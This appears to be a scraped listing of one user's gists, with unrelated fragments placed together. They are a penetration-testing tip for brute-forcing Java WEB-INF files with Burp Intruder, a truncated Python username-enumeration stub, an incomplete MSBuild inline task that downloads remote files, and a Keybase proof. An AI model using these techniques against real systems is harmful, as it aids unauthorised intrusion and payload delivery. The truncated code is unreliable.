bytecod3r

so, you can read WEB-INF/web.xml. how can you escalate this issue?

[step 1]. try to read other common Java files such as WEB-INF/web-jetty.xml. 

use a specialized wordlist such as the following (from 	Sergey Bobrov/BlackFan):
https://github.com/BlackFan/WEB-INF-dict/blob/master/web-inf.txt
with time you can build your own wordlist adding files you've discovered over time.
use Burp Intruder for this, it's perfect for this job.
sort Intruder results by status code so you can see instantly which files were found.

bytecod3r

import requests
import time

data=['nonexist123','correctUsernameHere.admin','nonexist124','correctUsernameHere.proliant','nonexist125','correctUsernameHere.admin','nonexist125','nonexist126','nonexist127','correctUsernameHere.cjackson','nonexist127','correctUsernameHere.admin','nonexist128','correctUsernameHere.proliant','nonexist129','correctUsernameHere.admin','nonexist130','nonexist131','nonexist132','correctUsernameHere.cjackson']

headers = {'content-type': 'application/json'}

url=''

bytecod3r

<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

   <UsingTask TaskName="DownloadFile" TaskFactory="CodeTaskFactory" AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll">
      <ParameterGroup>
         <Address ParameterType="System.String" Required="true" />
         <FileName ParameterType="System.String" Required="true" />
      </ParameterGroup>
      <Task>
         <Reference Include="System" />
         <Code Type="Fragment" Language="cs"><![CDATA[new System.Net.WebClient().DownloadFile(Address, FileName);]]></Code>

bytecod3r

Keybase proof

I hereby claim:

• I am bytecod3r on github.
• I am bytecod3r (https://keybase.io/bytecod3r) on keybase.
• I have a public key ASBR5agAouTH6ETDnlGsETT9L1JtD6Q3erGFzfDPhZSQMgo

To claim this, I am signing this object: